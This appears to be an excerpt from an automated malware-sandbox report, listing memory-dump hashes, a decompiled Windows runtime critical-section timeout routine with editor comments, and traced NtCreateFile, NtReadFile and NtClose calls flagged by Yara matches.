                          • Instruction Fuzzy Hash: 66C02B74150840FBE7165F30CE00F147294F704A31F6407A47320894F0E56C9C00D104
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                          • Instruction ID: 3dcc8d537ab351f164720f7ae8eca209885483aef1e84d13dfe21feb9185f5d0
                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                          • Instruction Fuzzy Hash: BBB092353019408FDE57EF18C080B1533F4BB44A40F8400D0E440CBA21D229E9008900
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                          • Instruction ID: 07779fabfb211d0a1cde484bb93d5badeaeed673af4d4a9e0bd05062bf9814c3
                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                          • Instruction Fuzzy Hash: 2FB01232C10444CFCF02EF40CA10B297332FF40750F054490A20167931C22CAC11DB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: faf6143a9dfebfbfcadba53fce2dd97480f4bd434d01e77e5f0c9c8aeef8bbcb
                          • Instruction ID: 445434661316b5bac21f645809d51336830627cc6d982003a9ecb48d0a02f0c1
                          • Opcode Fuzzy Hash: faf6143a9dfebfbfcadba53fce2dd97480f4bd434d01e77e5f0c9c8aeef8bbcb
                          • Instruction Fuzzy Hash: 879002A122140903D140659988046070109A7D0343F91C011A2454555ECA698C617275
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 93483d6a2618de7190ac9f488ee1bc92d3bf396ab5e9d0262d9b0b95b68f924a
                          • Instruction ID: 19d8912fbd956ea94acd83a66d8cf87fa946021ffdbfb035dfc4fc78c2fccdc6
                          • Opcode Fuzzy Hash: 93483d6a2618de7190ac9f488ee1bc92d3bf396ab5e9d0262d9b0b95b68f924a
                          • Instruction Fuzzy Hash: F09002A123100542D104619984047060149A7E1242F91C012A2544554CC5698C716265
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3c0cd099be4b50891aa274334f9dbd51d5f3e7eb64bc30476b43aaa23f4185a8
                          • Instruction ID: 13fff0bdcb069fef8d6b8a9808eb4ebe5d7da6ebb4d7974f9dcc40646a528cac
                          • Opcode Fuzzy Hash: 3c0cd099be4b50891aa274334f9dbd51d5f3e7eb64bc30476b43aaa23f4185a8
                          • Instruction Fuzzy Hash: 2D90027126100902D14171998404606010DB7D0282FD1C012A0814554EC6958A66BBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 499850189380c48b48b4810f1e0e8098d458b79e97eadc339855c3071291a351
                          • Instruction ID: 2d6333bf46b0a442f38ef25943159c5b283a4a08f99eb7ac62a27797e6360de1
                          • Opcode Fuzzy Hash: 499850189380c48b48b4810f1e0e8098d458b79e97eadc339855c3071291a351
                          • Instruction Fuzzy Hash: 269002A1621145434540B19988044065119B7E13423D1C121A0844560CC6A88865A3A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b970432eb44a64b7468df79c63a92d6111cc9c3c427807e8a015b1e009e4e836
                          • Instruction ID: 36f380b874187825325f68b0b508708f7cdc7ecb5227265dc4c709009d7ec030
                          • Opcode Fuzzy Hash: b970432eb44a64b7468df79c63a92d6111cc9c3c427807e8a015b1e009e4e836
                          • Instruction Fuzzy Hash: B690026132100902D10261998414606010DE7D1386FD1C012E1814555DC6658963B272
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ef437f1eb8ad3f53df82fd98be10d11836c0f1736e04462f52036f6f8f21733
                          • Instruction ID: de066ca831bea974e4b502f2359dd80ac8dbbf3fe7abe29be273ce9a2cb9ed43
                          • Opcode Fuzzy Hash: 3ef437f1eb8ad3f53df82fd98be10d11836c0f1736e04462f52036f6f8f21733
                          • Instruction Fuzzy Hash: 8990026126100D02D1407199C414707010AE7D0642F91C011A0414554DC656897577F1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eb185b7fb2268bf07e6e9916a2bbc9de7139b91f14f2e89a75a3b0942f3de86d
                          • Instruction ID: fc0602712ab44ef66cd6a9bb21d708f89c8d0e17c241f9f71251da78f653e115
                          • Opcode Fuzzy Hash: eb185b7fb2268bf07e6e9916a2bbc9de7139b91f14f2e89a75a3b0942f3de86d
                          • Instruction Fuzzy Hash: 2190027122144502D1407199C44460B5109B7E0342F91C411E0815554CC6558866A361
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db81c2131cc5d7569e2b941a66345877d83c0c683f156def2b021febb341f220
                          • Instruction ID: 04e414bc2a472f68e78c80f94a84dbc839c1701b1bff6549e20b968d9b4f9133
                          • Opcode Fuzzy Hash: db81c2131cc5d7569e2b941a66345877d83c0c683f156def2b021febb341f220
                          • Instruction Fuzzy Hash: 1790027122140902D100619988087470109A7D0343F91C011A5554555EC6A5C8A17671
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 817c2850f7ad0a9b403114d6d3a424fdc174293cdfcac5601bf01c557c455cd4
                          • Instruction ID: 44afaef8620daec406fb5eab3b984d2dce80aa709e56c4c1ded2a508197b5748
                          • Opcode Fuzzy Hash: 817c2850f7ad0a9b403114d6d3a424fdc174293cdfcac5601bf01c557c455cd4
                          • Instruction Fuzzy Hash: 1890026122144942D14062998804B0F4209A7E1243FD1C019A4546554CC95588656761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25c0706e37584b7939bdd80090be445a286f52a6fd7aebdc3b9e763a35f5feda
                          • Instruction ID: bbef87c4316f879fd00348d76f9d1b8f1a5c36a0c2f6e63e3ffbc24ec158a5b7
                          • Opcode Fuzzy Hash: 25c0706e37584b7939bdd80090be445a286f52a6fd7aebdc3b9e763a35f5feda
                          • Instruction Fuzzy Hash: 9D9002E1221145924500A299C404B0A4609A7E0242B91C016E1444560CC5658861A275
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47c1f9eff866176a8ead9f3e3b7e16ab9a7e8897e7339bb434f2425092edd2e6
                          • Instruction ID: a201254f0c99b29d1d72efd8b068178cead1a28dd3ae6cdeb2617b805cd69fd6
                          • Opcode Fuzzy Hash: 47c1f9eff866176a8ead9f3e3b7e16ab9a7e8897e7339bb434f2425092edd2e6
                          • Instruction Fuzzy Hash: 9A900271A2500512914071998814646410AB7E0782B95C011A0904554CC9948A6563E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2c8a0e96e3ae77f5bc1475f4f368976bc5a59b2fffee53213d295685cacc53dc
                          • Instruction ID: 01d690c2491289a16cefb2a75e89d65be9a500935ea5702fd1304b5c9513eb24
                          • Opcode Fuzzy Hash: 2c8a0e96e3ae77f5bc1475f4f368976bc5a59b2fffee53213d295685cacc53dc
                          • Instruction Fuzzy Hash: 21900265231005020145A599460450B0549B7D63923D1C015F1806590CC66188756361
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e469d562635e586c61fb23504879a98993cf1ab758cae2ac2605af7dc462061
                          • Instruction ID: 65cbdb5b8abe911aaee432da30c98f13b03c306f08de652ad463e98c2e99572e
                          • Opcode Fuzzy Hash: 1e469d562635e586c61fb23504879a98993cf1ab758cae2ac2605af7dc462061
                          • Instruction Fuzzy Hash: 1590027122100D02D104619988046860109A7D0342F91C011A6414655ED6A588A17271
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d15f1c3313029a03c0707caff2e9cc7c635c57b4de0ce1b36d129f664ba391b
                          • Instruction ID: 3abd754c73ed82c0ecb0a3807f013ec05deaa5214c74db521d77937526971426
                          • Opcode Fuzzy Hash: 6d15f1c3313029a03c0707caff2e9cc7c635c57b4de0ce1b36d129f664ba391b
                          • Instruction Fuzzy Hash: CD900271321005529500A6D99804A4A4209A7F0342B91D015A4404554CC59488716261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ab11fa6ecf890e9d3f2b65de6d234d6d84f6a5c16e45d5b046a3c8186bbc1e7
                          • Instruction ID: a0b96b9eef6f6a6f02e59979be703768a67cd350026d8c698c080111fd05b497
                          • Opcode Fuzzy Hash: 3ab11fa6ecf890e9d3f2b65de6d234d6d84f6a5c16e45d5b046a3c8186bbc1e7
                          • Instruction Fuzzy Hash: 6B90026162500902D140719994187060119A7D0242F91D011A0414554DC6998A6577E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: df40270e8e610e83362620f43771031d1facf7d1f6b4f96d73759cd44bff3c2e
                          • Instruction ID: 343e2be6aa9f8bcd5cff015e85cfeb2408ff8f7409ce7c333c9f532a4dc8afd1
                          • Opcode Fuzzy Hash: df40270e8e610e83362620f43771031d1facf7d1f6b4f96d73759cd44bff3c2e
                          • Instruction Fuzzy Hash: B690027122100903D100619995087070109A7D0242F91D411A0814558DD69688617261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a2663dffcf8762e23be70eb0d8b6fd4d96f6c94c4f8303e84da7d7c18f99a6f
                          • Instruction ID: 9ac1a8b09035e0cc81290d581e2d974261327ce542baca8d2ff2612d245b3e60
                          • Opcode Fuzzy Hash: 3a2663dffcf8762e23be70eb0d8b6fd4d96f6c94c4f8303e84da7d7c18f99a6f
                          • Instruction Fuzzy Hash: 9590027522504942D50065999804A870109A7D0346F91D411A081459CDC6948871B261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 90846ec646525319f91e9e93f4b8bd1d642747ff14320bd62b79f2e3bb41a86a
                          • Instruction ID: aac337c5de8b4efa4cf54b4d915773d55e78858876539a1ed8edeee03bffa42f
                          • Opcode Fuzzy Hash: 90846ec646525319f91e9e93f4b8bd1d642747ff14320bd62b79f2e3bb41a86a
                          • Instruction Fuzzy Hash: 8390026122504942D10065999408A060109A7D0246F91D011A1454595DC6758861B271
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3bd53f3d76982ce81c50cdbdd97b48a5548e1c6f8c36993a5cfbb5a88164216b
                          • Instruction ID: 7dedbcbf9af5667bd211eb4a070f9042a282fb26ef9c61fce3fcff3b030be0ab
                          • Opcode Fuzzy Hash: 3bd53f3d76982ce81c50cdbdd97b48a5548e1c6f8c36993a5cfbb5a88164216b
                          • Instruction Fuzzy Hash: 0F90027162500D02D150719984147460109A7D0342F91C011A0414654DC7958A6577E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d56040d9bf4e343644818a4a20a613db49afd91fe8499f161e7e0f598d5ae0e3
                          • Instruction ID: 32352129f9461d6858092b3a50f57e83c265fad49a09f1a75545861e4da16c90
                          • Opcode Fuzzy Hash: d56040d9bf4e343644818a4a20a613db49afd91fe8499f161e7e0f598d5ae0e3
                          • Instruction Fuzzy Hash: E890027122504D42D14071998404A460119A7D0346F91C011A0454694DD6658D65B7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a69f79b7b792bd2479ee4560fbafb4ea4b70b1c8a93bd60d6335fe16fee2df0
                          • Instruction ID: 79815e2fc6dc23ff0ff904b6267ec1a968effc08295fb863cc57ffdcbe546b37
                          • Opcode Fuzzy Hash: 5a69f79b7b792bd2479ee4560fbafb4ea4b70b1c8a93bd60d6335fe16fee2df0
                          • Instruction Fuzzy Hash: FB90027122100D42D10061998404B460109A7E0342F91C016A0514654DC655C8617661
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction ID: 63320afde319bd72aea9ba72a9a890aaf3ce4b5175db8d93795c45f68dcd5e5b
                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction Fuzzy Hash:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 53%
                          			/* Decompiler output as listed in the report; the trailing address on each statement line is
                          			   the instruction address the report lists for that line, merged here from the separate
                          			   address column. Comments are the editor's reading of the offsets, not decompiler output. */
                          			E0107FDDA(intOrPtr* __edx, intOrPtr _a4) {
                          				void* _t7;
                          				intOrPtr _t9;
                          				intOrPtr _t10;
                          				intOrPtr* _t12;
                          				intOrPtr* _t13;
                          				intOrPtr _t14;
                          				intOrPtr* _t15;
                          
                          				_t13 = __edx;                                                                   /* 0x0107fdda  __edx points at a 64-bit timeout (two dwords) */
                          				_push(_a4);                                                                     /* 0x0107fde2 */
                          				_t14 =  *[fs:0x18];                                                             /* 0x0107fde5  TEB self pointer (fs:0x18 on 32-bit Windows) */
                          				_t15 = _t12;                                                                    /* 0x0107fdec  _t15: RTL_CRITICAL_SECTION* (see offsets below) */
                          				_t7 = E0102CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);   /* 0x0107fdfa  64-bit divide of the timeout by 0xFFFFFFFFFF676980 (-10,000,000 = one second in 100 ns units), giving seconds for the "%I64u secs" message below */
                          				_push(_t13);                                                                    /* 0x0107fdff */
                          				E01075720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);   /* 0x0107fe0a  (ComponentId 0x65 = DPFLTR_DEFAULT_ID, Level 1 = DPFLTR_WARNING_LEVEL, Format, ...) matches the DbgPrintEx signature */
                          				_t9 =  *_t15;                                                                   /* 0x0107fe0f  RTL_CRITICAL_SECTION.DebugInfo (offset 0) */
                          				if(_t9 == 0xffffffff) {                                                         /* 0x0107fe17  DebugInfo == -1: no debug record attached */
                          					_t10 = 0;                                                                   /* 0x0107fe1e */
                          				} else {                                                                        /* 0x0107fe19 */
                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));                                         /* 0x0107fe19  RTL_CRITICAL_SECTION_DEBUG.ContentionCount (offset 0x14) */
                          				}                                                                               /* 0x0107fe19 */
                          				_push(_t10);                                                                    /* 0x0107fe20  ContentionCount */
                          				_push(_t15);                                                                    /* 0x0107fe21  critical section address */
                          				_push( *((intOrPtr*)(_t15 + 0xc)));                                             /* 0x0107fe22  RTL_CRITICAL_SECTION.OwningThread (offset 0xc) */
                          				_push( *((intOrPtr*)(_t14 + 0x24)));                                            /* 0x0107fe25  TEB.ClientId.UniqueThread (offset 0x24) */
                          				return E01075720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));   /* 0x0107fe40  Level 0 = DPFLTR_ERROR_LEVEL; last argument is TEB.ClientId.UniqueProcess (offset 0x20) */
                          			}
                          			/* Taken together (TEB, RTL_CRITICAL_SECTION and RTL_CRITICAL_SECTION_DEBUG field offsets, DPFLTR
                          			   component/level constants, the "RTL:" format strings), this is runtime-library critical-section
                          			   timeout diagnostics living in the dumped region, not sample-specific logic. */

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0107FDFA
                          Strings
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0107FE2B
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0107FE01
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                          • API String ID: 885266447-3903918235
                          • Opcode ID: 783ee843891b6faa291fa7dca412ef56f340233dc52d20569087e1e14c44ab77
                          • Instruction ID: f31177dda8a7ad685a5369ec7a19e25fdb2cef152321fea1928542c7daaf626c
                          • Opcode Fuzzy Hash: 783ee843891b6faa291fa7dca412ef56f340233dc52d20569087e1e14c44ab77
                          • Instruction Fuzzy Hash: 00F0F632600602BFEA201A55DC02F67BF6AFB94B30F140315F668561D1DAA2F820D6F5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Executed Functions

                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02DD3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DD3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02DD862D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                          • Instruction ID: 0fe360bbb1af3487891d010561a523d4884ddbdf0dce8d998af98cf3268b83e2
                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                          • Instruction Fuzzy Hash: CDF0BDB2204208ABCB08CF88DC94EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02DD3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DD3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02DD862D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: 376b76feb21824fa48789a8f80c8a437da893c14e663adeb08cbf43f4dd1fed7
                          • Instruction ID: 5723dd8020f2b4ee1a6eaf2265fbac9e88f0b68f42e847dd6ede0ec9c0344139
                          • Opcode Fuzzy Hash: 376b76feb21824fa48789a8f80c8a437da893c14e663adeb08cbf43f4dd1fed7
                          • Instruction Fuzzy Hash: 78F014B6204188ABCB08CF98D884CEB77A9EF8C350B15864DFA0D93202C634E851CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtReadFile.NTDLL(02DD3D72,5E972F65,FFFFFFFF,02DD3A31,?,?,02DD3D72,?,02DD3A31,FFFFFFFF,5E972F65,02DD3D72,?,00000000), ref: 02DD86D5
                          • NtClose.NTDLL(02DD3D50,?,?,02DD3D50,00000000,FFFFFFFF), ref: 02DD8735
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CloseFileRead
                          • String ID:
                          • API String ID: 752142053-0
                          • Opcode ID: 0d24d278059620e815b43ad25f047fdd73d2e6c9f4eeb68bd90787b8b3011962
                          • Instruction ID: 8ad2a4f143c01b3c3c10d7ccafb2bb2762559d67dc1d6ed68dd57959c39b4813
                          • Opcode Fuzzy Hash: 0d24d278059620e815b43ad25f047fdd73d2e6c9f4eeb68bd90787b8b3011962
                          • Instruction Fuzzy Hash: ECF019B6204108ABC714EF98DC84DEB77ADEF8C750F148658FA1897201C630EA118BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtReadFile.NTDLL(02DD3D72,5E972F65,FFFFFFFF,02DD3A31,?,?,02DD3D72,?,02DD3A31,FFFFFFFF,5E972F65,02DD3D72,?,00000000), ref: 02DD86D5
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                          • Instruction ID: 7c1166e39135a5d0b113aba33cd3fc414f0d6e044a37683040261778bf6ec60b
                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                          • Instruction Fuzzy Hash: CAF0A4B2200208ABCB14DF89DC94EEB77ADEF8C754F158248BA1D97241D630E911CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtClose.NTDLL(02DD3D50,?,?,02DD3D50,00000000,FFFFFFFF), ref: 02DD8735
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                          • Instruction ID: 47312583a06e13d057db28790eb6cea0be4b911d63f980f358dcf14ded3ab009
                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                          • Instruction Fuzzy Hash: 5AD01776200214ABD710EBD8CC89EE77BADEF48760F154499BA189B242C530FA00CAE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6741f413dcbb8811a00149df40fd7fb38c384f1a4481e653d767683a312df4ab
                          • Instruction ID: ab9d54a49a59b4abe972bfbd43d2950de35584a9ddd00727bc05e93b4410a482
                          • Opcode Fuzzy Hash: 6741f413dcbb8811a00149df40fd7fb38c384f1a4481e653d767683a312df4ab
                          • Instruction Fuzzy Hash: 2090026121185442D200A5A94C14F17040997D0343F51C555A1148664CCA5588796561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: d09eaf6ddacb1a807efae09c3c5e7859cef998757ae1b1768fbe0757183c5ff0
                          • Instruction ID: 0ab46c001ee3f149fa2c7aa4aaf5b2d443abec2218d5c885702d5f7f2844dfea
                          • Opcode Fuzzy Hash: d09eaf6ddacb1a807efae09c3c5e7859cef998757ae1b1768fbe0757183c5ff0
                          • Instruction Fuzzy Hash: 869002A134105842D100A1994414F160409D7E1341F51C455E2058664D8759CC6A7166
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 9274681e399034cfa754c0c07b750f6ab9a6ae547bcc1f20a1f6f74dd23c2fc1
                          • Instruction ID: c000a135aded9b6d623a744c4e205e408d5a781b40a81f34f3b5c25437e1be5b
                          • Opcode Fuzzy Hash: 9274681e399034cfa754c0c07b750f6ab9a6ae547bcc1f20a1f6f74dd23c2fc1
                          • Instruction Fuzzy Hash: 619002B120105802D140B1994404B56040997D0341F51C451A6058664E87998DED76A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 7f1f20f30a5ec174343167962756e8e0209a2b445154af7d0965530d6b6a4c3e
                          • Instruction ID: 1b53f735bbe321a3808b729d704f083b4a195d464584ea72115d4ffb9e766619
                          • Opcode Fuzzy Hash: 7f1f20f30a5ec174343167962756e8e0209a2b445154af7d0965530d6b6a4c3e
                          • Instruction Fuzzy Hash: 52900261242095525545F1994404A17440AA7E0281791C452A2408A60C8666986EE661
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
